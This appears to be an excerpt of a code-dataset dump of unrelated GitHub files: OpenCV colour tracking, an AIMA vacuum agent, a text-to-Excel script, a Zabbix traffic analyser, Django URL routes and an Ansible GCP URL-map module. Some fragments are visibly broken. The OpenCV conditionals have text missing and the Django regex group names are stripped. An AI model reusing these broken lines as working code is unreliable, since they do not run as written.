color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n \r\n\r\n #Tracking the green Color\r\n \r\n contornosimg = green.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n green_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"green color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n \r\n\r\n #Tracking the black Color\r\n \r\n contornosimg = black.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n black_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"black color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n \r\n\r\n #Tracking the orange Color\r\n \r\n \r\n \r\n \r\n \r\n contornosimg = orange.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n orange_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"orange color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n\r\n \r\n \r\n \r\n if(xb==0):\r\n if(xr>(x1+30) or xr<(x1-30)):\r\n if(x1(y1+30) or yr<(y1-30)):\r\n if(y1(x2+30) or xb<(x2-30)):\r\n if(x1(y2+30) or yb<(y2-30)):\r\n if(y2 Actuator:\n location: str = location_status.name\n status: str = location_status.value\n\n action: str = ''\n if status == 'Dirty':\n action = 'Suck'\n elif location == 'A':\n action = 'Right'\n elif location == 'B':\n action = 'Left'\n\n return Actuator('action', action)\n", "repo_name": "GrahamStrickland/aima", "sub_path": "ch02/agents/reflex_vacuum_agent.py", "file_name": "reflex_vacuum_agent.py", "file_ext": "py", "file_size_in_byte": 452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "modules.sensor.Sensor", "line_number": 6, "usage_type": "name"}, {"api_name": "modules.actuator.Actuator", "line_number": 18, "usage_type": "call"}, {"api_name": "modules.actuator.Actuator", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "12958861331", "text": "#! python3\r\n# Reads text files, put them into lists and then input into an excel file\r\nimport openpyxl, os\r\ndef TextToExcel(folder):\r\n wb = openpyxl.Workbook()\r\n sheet = wb.active\r\n num_column = 0\r\n # Going through the file\r\n for foldername, subfolders, filenames in os.walk(folder):\r\n for fl_int in range(len(filenames)):\r\n filename = list(filenames)\r\n file_ = open(foldername + '\\\\' + filename[fl_int],'r')\r\n # Acquiring the text form .txt\r\n text_ = file_.readlines()\r\n text_ = text_[0].split(' ')\r\n for num_row in range(len(text_)):\r\n sheet.cell(row = num_row + 1, column = num_column + 1).value = text_[num_row]\r\n print(text_[num_row])\r\n num_column += 1\r\n wb.save('TextToExcel.xlsx')\r\n\r\nTextToExcel(r'C:\\Users\\Dr. Wan Asna\\Desktop\\Python Projects\\Automate the Boring Stuff\\Ch.13 - Working with Excel Spreadsheets\\num')", "repo_name": "QaisZainon/Learning-Coding", "sub_path": "Automate the Boring Stuff/Ch.13 - Working with Excel Spreadsheets/TextFilestoSpreadsheet.py", "file_name": "TextFilestoSpreadsheet.py", "file_ext": "py", "file_size_in_byte": 954, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openpyxl.Workbook", "line_number": 5, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "73550887553", "text": "from pyzabbix import ZabbixAPI\nfrom zabbix import Zabbix\nimport time\nimport json\nfrom datetime import datetime\nimport os.path\nfrom os import path\n\n\nclass TrafficAnalyzer:\n\n def __init__(self, in_traffic_tag, in_incoming_traffic_id, in_outgoing_traffic_id):\n self.traffic_tag = in_traffic_tag\n self.incoming_traffic_id = in_incoming_traffic_id\n self.outgoing_traffic_id = in_outgoing_traffic_id\n\n self.final_result = list()\n\n # Zabbix API Credentials\n self.zabbix = Zabbix()\n self.ZABBIX_SERVER = self.zabbix.ZABBIX_SERVER\n self.ZABBIX_USER = self.zabbix.ZABBIX_USER\n self.ZABBIX_PSSW = self.zabbix.ZABBIX_PSSW\n self.zapi = ZabbixAPI(self.ZABBIX_SERVER)\n self.zapi.login(self.ZABBIX_USER, self.ZABBIX_PSSW)\n\n # Time frame to be considered\n self.time_till = time.mktime(datetime.now().timetuple())\n self.time_from = self.time_till - 60 * 60 * 1 # last 1 hours\n\n if path.exists('data_file.json'):\n os.remove('data_file.json')\n \n def check_traffic(self, source):\n \"\"\"\n Method to retrieve the historical values from some item (port) given its ID\n API connection to get item's history \n The returned values contains the item id, clock, value, and ns\n \"\"\"\n result = list()\n \n # Query item's history (integer) data\n history = self.zapi.history.get(itemids=[source],\n time_from=self.time_from,\n time_till=self.time_till,\n output='extend',\n limit='5000')\n\n # If nothing was found, try getting it from history (float) data\n if not len(history):\n history = self.zapi.history.get(itemids=[source],\n time_from=self.time_from,\n time_till=self.time_till,\n output='extend',\n limit='5000',\n history=0)\n\n # Create the list with entries using each data point information\n for point in history:\n result.append((int(point['clock']), int(point['value'])))\n\n return result\n\n def get_traffic(self, traffic_type='in'):\n \"\"\"\n Method to check Node/Port traffic\n \"\"\"\n if traffic_type == 'in':\n return self.check_traffic(self.incoming_traffic_id)\n else:\n return self.check_traffic(self.outgoing_traffic_id)\n\n def merge_traffic(self, source1, source2):\n \"\"\"\n Method to merge both traffic values in a same Data Structure\n \"\"\"\n i = 0\n while i < len(source1):\n tmp = (source1[i][0], source1[i][1], source2[i][1])\n self.final_result.append(tmp)\n i += 1\n\n def build_json(self, tag, points):\n \"\"\"\n Method to create a json object given the tag name and the points list\n \"\"\"\n dict_obj = {tag: {\"name\": \"\", \"utc\": True, \"columns\": [\"time\", \"in\", \"out\"],\n \"points\": points}}\n r = json.dumps(dict_obj)\n\n if path.exists('data_file.json'):\n data = dict()\n with open(\"data_file.json\", 'r+') as write_file:\n old_data = json.load(write_file)\n data = dict(old_data)\n data.update(dict_obj)\n\n with open(\"data_file.json\", 'r+') as write_file:\n json.dump(data, write_file)\n else:\n with open(\"data_file.json\", 'w+') as write_file:\n json.dump(dict_obj, write_file)\n\n write_file.close()\n print(r)\n\n def traffic_on_json(self):\n \"\"\"\n Compute the incoming traffic and outgoing traffic, merge both information in a same data structure\n and send that result to be structured as a JSON\n \"\"\"\n # Incoming Traffic\n results1 = self.get_traffic('in')\n\n # Outgoing Traffic\n results2 = self.get_traffic('out')\n\n self.merge_traffic(results1, results2)\n\n print(\"Merged Traffic\")\n self.build_json(self.traffic_tag, self.final_result)\n\n return self.final_result\n\n def total_traffic(self, source1, source2):\n \"\"\"\n Method to compute the total traffic between two points\n \"\"\"\n i = 0\n out_total_traffic = list()\n while i < len(source1):\n tmp = (source2[i][0], source1[i][1] + source2[i][1], source1[i][2] + source2[i][2])\n out_total_traffic.append(tmp)\n i += 1\n\n print(\"Total Traffic\")\n self.build_json(\"Total\", out_total_traffic)\n", "repo_name": "amlight/weathermap", "sub_path": "venv/include/trafficanalyzer.py", "file_name": "trafficanalyzer.py", "file_ext": "py", "file_size_in_byte": 4792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "zabbix.Zabbix", "line_number": 20, "usage_type": "call"}, {"api_name": "pyzabbix.ZabbixAPI", "line_number": 24, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "name"}, {"api_name": "json.load", "line_number": 94, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 99, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "12816261862", "text": "from django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nfrom . import views\n\napp_name = \"website\"\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^login$', views.login_user, name='login'),\n url(r'^logout$', views.user_logout, name='logout'),\n url(r'^register$', views.register, name='register'),\n url(r'^addmember$', views.addmember, name='addmember'), \n url(r'^adddetainee$', views.add_detainee, name='detainee'),\n url(r'^addsession$', views.session, name='addsession'),\n url(r'^session/(?P\\d+)/$', views.updatesessionrole.as_view(), name='updatesession'),\n url(r'^detainee/(?P\\d+)/$', views.detainee, name='detaineedetail'),\n url(r'^createreport$', views.report, name='report'),\n url(r'^report/(?P\\d+)/$', views.singlereport, name='singlereport'),\n url(r'^editreport/(?P\\d+)/$', views.editreport.as_view(), name='editreport'),\n url(r'^editprofile$', views.editprofile, name='editprofile'),\n url(r'^team$', views.team, name='team'),\n url(r'^pdfreport/(?P\\d+)/$', views.pdfreport, name='pdf')\n # url(r'^deleteuser$', views.userdelete, name='deleteuser'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "repo_name": "jcarter0149/reports-cap_stone_back", "sub_path": "website/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 27, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "29366537851", "text": "from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n################################################################################\n# Documentation\n################################################################################\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': [\"preview\"],\n 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: gcp_compute_url_map\ndescription:\n - UrlMaps are used to route requests to a backend service based on rules that you\n define for the host and path of an incoming URL.\nshort_description: Creates a GCP UrlMap\nversion_added: 2.6\nauthor: Google Inc. (@googlecloudplatform)\nrequirements:\n - python >= 2.6\n - requests >= 2.18.4\n - google-auth >= 1.3.0\noptions:\n state:\n description:\n - Whether the given object should exist in GCP\n choices: ['present', 'absent']\n default: 'present'\n default_service:\n description:\n - A reference to BackendService resource if none of the hostRules match.\n required: true\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n required: false\n host_rules:\n description:\n - The list of HostRules to use against the URL.\n required: false\n suboptions:\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n required: false\n hosts:\n description:\n - The list of host patterns to match. They must be valid hostnames, except * will\n match any string of ([a-z0-9-.]*). In that case, * must be the first character and\n must be followed in the pattern by either - or .\n required: false\n path_matcher:\n description:\n - The name of the PathMatcher to use to match the path portion of the URL if the hostRule\n matches the URL's host portion.\n required: false\n name:\n description:\n - Name of the resource. Provided by the client when the resource is created. The name\n must be 1-63 characters long, and comply with RFC1035. Specifically, the name must\n be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`\n which means the first character must be a lowercase letter, and all following characters\n must be a dash, lowercase letter, or digit, except the last character, which cannot\n be a dash.\n required: false\n path_matchers:\n description:\n - The list of named PathMatchers to use against the URL.\n required: false\n suboptions:\n default_service:\n description:\n - A reference to a BackendService resource. This will be used if none of the pathRules\n defined by this PathMatcher is matched by the URL's path portion.\n required: false\n description:\n description:\n - An optional description of this resource.\n required: false\n name:\n description:\n - The name to which this PathMatcher is referred by the HostRule.\n required: false\n path_rules:\n description:\n - The list of path rules.\n required: false\n suboptions:\n paths:\n description:\n - 'The list of path patterns to match. Each must start with / and the only place a\n * is allowed is at the end following a /. The string fed to the path matcher does\n not include any text after the first ? or #, and those chars are not allowed here.'\n required: false\n service:\n description:\n - A reference to the BackendService resource if this rule is matched.\n required: false\n tests:\n description:\n - The list of expected URL mappings. Request to update this UrlMap will succeed only\n if all of the test cases pass.\n required: false\n suboptions:\n description:\n description:\n - Description of this test case.\n required: false\n host:\n description:\n - Host portion of the URL.\n required: false\n path:\n description:\n - Path portion of the URL.\n required: false\n service:\n description:\n - A reference to expected BackendService resource the given URL should be mapped to.\n required: false\nextends_documentation_fragment: gcp\n'''\n\nEXAMPLES = '''\n- name: create a instance group\n gcp_compute_instance_group:\n name: \"instancegroup-urlmap\"\n zone: us-central1-a\n project: \"{{ gcp_project }}\"\n auth_kind: \"{{ gcp_cred_kind }}\"\n service_account_file: \"{{ gcp_cred_file }}\"\n state: present\n register: instancegroup\n\n- name: create a http health check\n gcp_compute_http_health_check:\n name: \"httphealthcheck-urlmap\"\n healthy_threshold: 10\n port: 8080\n timeout_sec: 2\n unhealthy_threshold: 5\n project: \"{{ gcp_project }}\"\n auth_kind: \"{{ gcp_cred_kind }}\"\n service_account_file: \"{{ gcp_cred_file }}\"\n state: present\n register: healthcheck\n\n- name: create a backend service\n gcp_compute_backend_service:\n name: \"backendservice-urlmap\"\n backends:\n - group: \"{{ instancegroup }}\"\n health_checks:\n - \"{{ healthcheck.selfLink }}\"\n enable_cdn: true\n project: \"{{ gcp_project }}\"\n auth_kind: \"{{ gcp_cred_kind }}\"\n service_account_file: \"{{ gcp_cred_file }}\"\n state: present\n register: backendservice\n\n- name: create a url map\n gcp_compute_url_map:\n name: \"test_object\"\n default_service: \"{{ backendservice }}\"\n project: \"test_project\"\n auth_kind: \"service_account\"\n service_account_file: \"/tmp/auth.pem\"\n state: present\n'''\n\nRETURN = '''\n creation_timestamp:\n description:\n - Creation timestamp in RFC3339 text format.\n returned: success\n type: str\n default_service:\n description:\n - A reference to BackendService resource if none of the hostRules match.\n returned: success\n type: dict\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n returned: success\n type: str\n host_rules:\n description:\n - The list of HostRules to use against the URL.\n returned: success\n type: complex\n contains:\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n returned: success\n type: str\n hosts:\n description:\n - The list of host patterns to match. They must be valid hostnames, except * will\n match any string of ([a-z0-9-.]*). In that case, * must be the first character and\n must be followed in the pattern by either - or .\n returned: success\n type: list\n path_matcher:\n description:\n - The name of the PathMatcher to use to match the path portion of the URL if the hostRule\n matches the URL's host portion.\n returned: success\n type: str\n id:\n description:\n - The unique identifier for the resource.\n returned: success\n type: int\n name:\n description:\n - Name of the resource. Provided by the client when the resource is created. The name\n must be 1-63 characters long, and comply with RFC1035. Specifically, the name must\n be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`\n which means the first character must be a lowercase letter, and all following characters\n must be a dash, lowercase letter, or digit, except the last character, which cannot\n be a dash.\n returned: success\n type: str\n path_matchers:\n description:\n - The list of named PathMatchers to use against the URL.\n returned: success\n type: complex\n contains:\n default_service:\n description:\n - A reference to a BackendService resource. This will be used if none of the pathRules\n defined by this PathMatcher is matched by the URL's path portion.\n returned: success\n type: dict\n description:\n description:\n - An optional description of this resource.\n returned: success\n type: str\n name:\n description:\n - The name to which this PathMatcher is referred by the HostRule.\n returned: success\n type: str\n path_rules:\n description:\n - The list of path rules.\n returned: success\n type: complex\n contains:\n paths:\n description:\n - 'The list of path patterns to match. Each must start with / and the only place a\n * is allowed is at the end following a /. The string fed to the path matcher does\n not include any text after the first ? or #, and those chars are not allowed here.'\n returned: success\n type: list\n service:\n description:\n - A reference to the BackendService resource if this rule is matched.\n returned: success\n type: dict\n tests:\n description:\n - The list of expected URL mappings. Request to update this UrlMap will succeed only\n if all of the test cases pass.\n returned: success\n type: complex\n contains:\n description:\n description:\n - Description of this test case.\n returned: success\n type: str\n host:\n description:\n - Host portion of the URL.\n returned: success\n type: str\n path:\n description:\n - Path portion of the URL.\n returned: success\n type: str\n service:\n description:\n - A reference to expected BackendService resource the given URL should be mapped to.\n returned: success\n type: dict\n'''\n\n################################################################################\n# Imports\n################################################################################\n\nfrom ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict\nimport json\nimport time\n\n################################################################################\n# Main\n################################################################################\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n module = GcpModule(\n argument_spec=dict(\n state=dict(default='present', choices=['present', 'absent'], type='str'),\n default_service=dict(required=True, type='dict'),\n description=dict(type='str'),\n host_rules=dict(type='list', elements='dict', options=dict(\n description=dict(type='str'),\n hosts=dict(type='list', elements='str'),\n path_matcher=dict(type='str')\n )),\n name=dict(type='str'),\n path_matchers=dict(type='list', elements='dict', options=dict(\n default_service=dict(type='dict'),\n description=dict(type='str'),\n name=dict(type='str'),\n path_rules=dict(type='list', elements='dict', options=dict(\n paths=dict(type='list', elements='str'),\n service=dict(type='dict')\n ))\n )),\n tests=dict(type='list', elements='dict', options=dict(\n description=dict(type='str'),\n host=dict(type='str'),\n path=dict(type='str'),\n service=dict(type='dict')\n ))\n )\n )\n\n if not module.params['scopes']:\n module.params['scopes'] = ['https://www.googleapis.com/auth/compute']\n\n state = module.params['state']\n kind = 'compute#urlMap'\n\n fetch = fetch_resource(module, self_link(module), kind)\n changed = False\n\n if fetch:\n if state == 'present':\n if is_different(module, fetch):\n fetch = update(module, self_link(module), kind)\n changed = True\n else:\n delete(module, self_link(module), kind)\n fetch = {}\n changed = True\n else:\n if state == 'present':\n fetch = create(module, collection(module), kind)\n changed = True\n else:\n fetch = {}\n\n fetch.update({'changed': changed})\n\n module.exit_json(**fetch)\n\n\ndef create(module, link, kind):\n auth = GcpSession(module, 'compute')\n return wait_for_operation(module, auth.post(link, resource_to_request(module)))\n\n\ndef update(module, link, kind):\n auth = GcpSession(module, 'compute')\n return wait_for_operation(module, auth.put(link, resource_to_request(module)))\n\n\ndef delete(module, link, kind):\n auth = GcpSession(module, 'compute')\n return wait_for_operation(module, auth.delete(link))\n\n\ndef resource_to_request(module):\n request = {\n u'kind': 'compute#urlMap',\n u'defaultService': replace_resource_dict(module.params.get(u'default_service', {}), 'selfLink'),\n u'description': module.params.get('description'),\n u'hostRules': UrlMapHostRulesArray(module.params.get('host_rules', []), module).to_request(),\n u'name': module.params.get('name'),\n u'pathMatchers': UrlMapPathMatchersArray(module.params.get('path_matchers', []), module).to_request(),\n u'tests': UrlMapTestsArray(module.params.get('tests', []), module).to_request()\n }\n return_vals = {}\n for k, v in request.items():\n if v:\n return_vals[k] = v\n\n return return_vals\n\n\ndef fetch_resource(module, link, kind):\n auth = GcpSession(module, 'compute')\n return return_if_object(module, auth.get(link), kind)\n\n\ndef self_link(module):\n return \"https://www.googleapis.com/compute/v1/projects/{project}/global/urlMaps/{name}\".format(**module.params)\n\n\ndef collection(module):\n return \"https://www.googleapis.com/compute/v1/projects/{project}/global/urlMaps\".format(**module.params)\n\n\ndef return_if_object(module, response, kind):\n # If not found, return nothing.\n if response.status_code == 404:\n return None\n\n # If no content, return nothing.\n if response.status_code == 204:\n return None\n\n try:\n module.raise_for_status(response)\n result = response.json()\n except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:\n module.fail_json(msg=\"Invalid JSON response with error: %s\" % inst)\n\n if navigate_hash(result, ['error', 'errors']):\n module.fail_json(msg=navigate_hash(result, ['error', 'errors']))\n if result['kind'] != kind:\n module.fail_json(msg=\"Incorrect result: {kind}\".format(**result))\n\n return result\n\n\ndef is_different(module, response):\n request = resource_to_request(module)\n response = response_to_hash(module, response)\n\n # Remove all output-only from response.\n response_vals = {}\n for k, v in response.items():\n if k in request:\n response_vals[k] = v\n\n request_vals = {}\n for k, v in request.items():\n if k in response:\n request_vals[k] = v\n\n return GcpRequest(request_vals) != GcpRequest(response_vals)\n\n\n# Remove unnecessary properties from the response.\n# This is for doing comparisons with Ansible's current parameters.\ndef response_to_hash(module, response):\n return {\n u'creationTimestamp': response.get(u'creationTimestamp'),\n u'defaultService': response.get(u'defaultService'),\n u'description': response.get(u'description'),\n u'hostRules': UrlMapHostRulesArray(response.get(u'hostRules', []), module).from_response(),\n u'id': response.get(u'id'),\n u'name': response.get(u'name'),\n u'pathMatchers': UrlMapPathMatchersArray(response.get(u'pathMatchers', []), module).from_response(),\n u'tests': UrlMapTestsArray(response.get(u'tests', []), module).from_response()\n }\n\n\ndef async_op_url(module, extra_data=None):\n if extra_data is None:\n extra_data = {}\n url = \"https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}\"\n combined = extra_data.copy()\n combined.update(module.params)\n return url.format(**combined)\n\n\ndef wait_for_operation(module, response):\n op_result = return_if_object(module, response, 'compute#operation')\n if op_result is None:\n return {}\n status = navigate_hash(op_result, ['status'])\n wait_done = wait_for_completion(status, op_result, module)\n return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#urlMap')\n\n\ndef wait_for_completion(status, op_result, module):\n op_id = navigate_hash(op_result, ['name'])\n op_uri = async_op_url(module, {'op_id': op_id})\n while status != 'DONE':\n raise_if_errors(op_result, ['error', 'errors'], 'message')\n time.sleep(1.0)\n if status not in ['PENDING', 'RUNNING', 'DONE']:\n module.fail_json(msg=\"Invalid result %s\" % status)\n op_result = fetch_resource(module, op_uri, 'compute#operation')\n status = navigate_hash(op_result, ['status'])\n return op_result\n\n\ndef raise_if_errors(response, err_path, module):\n errors = navigate_hash(response, err_path)\n if errors is not None:\n module.fail_json(msg=errors)\n\n\nclass UrlMapHostRulesArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({\n u'description': item.get('description'),\n u'hosts': item.get('hosts'),\n u'pathMatcher': item.get('path_matcher')\n })\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({\n u'description': item.get(u'description'),\n u'hosts': item.get(u'hosts'),\n u'pathMatcher': item.get(u'pathMatcher')\n })\n\n\nclass UrlMapPathMatchersArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({\n u'defaultService': replace_resource_dict(item.get(u'default_service', {}), 'selfLink'),\n u'description': item.get('description'),\n u'name': item.get('name'),\n u'pathRules': UrlMapPathRulesArray(item.get('path_rules', []), self.module).to_request()\n })\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({\n u'defaultService': item.get(u'defaultService'),\n u'description': item.get(u'description'),\n u'name': item.get(u'name'),\n u'pathRules': UrlMapPathRulesArray(item.get(u'pathRules', []), self.module).from_response()\n })\n\n\nclass UrlMapPathRulesArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({\n u'paths': item.get('paths'),\n u'service': replace_resource_dict(item.get(u'service', {}), 'selfLink')\n })\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({\n u'paths': item.get(u'paths'),\n u'service': item.get(u'service')\n })\n\n\nclass UrlMapTestsArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({\n u'description': item.get('description'),\n u'host': item.get('host'),\n u'path': item.get('path'),\n u'service': replace_resource_dict(item.get(u'service', {}), 'selfLink')\n })\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({\n u'description': item.get(u'description'),\n u'host': item.get(u'host'),\n u'path': item.get(u'path'),\n u'service': item.get(u'service')\n })\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "amitvashist7/ansible-development-CTS", "sub_path": "molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/google/gcp_compute_url_map.py", "file_name": "gcp_compute_url_map.py", "file_ext": "py", "file_size_in_byte": 23371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ansible.module_utils.gcp_utils.GcpModule", "line_number": 318, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 378, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 383, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 388, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 395, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 411, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 435, "usage_type": "attribute"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 438, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 439, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpRequest", "line_number": 461, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 492, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 494, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 498, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 502, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 506, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 511, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 537, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 544, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 572, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 573, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 580, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 609, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 611, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 615, "usage_type": "call"}, {"api_name": 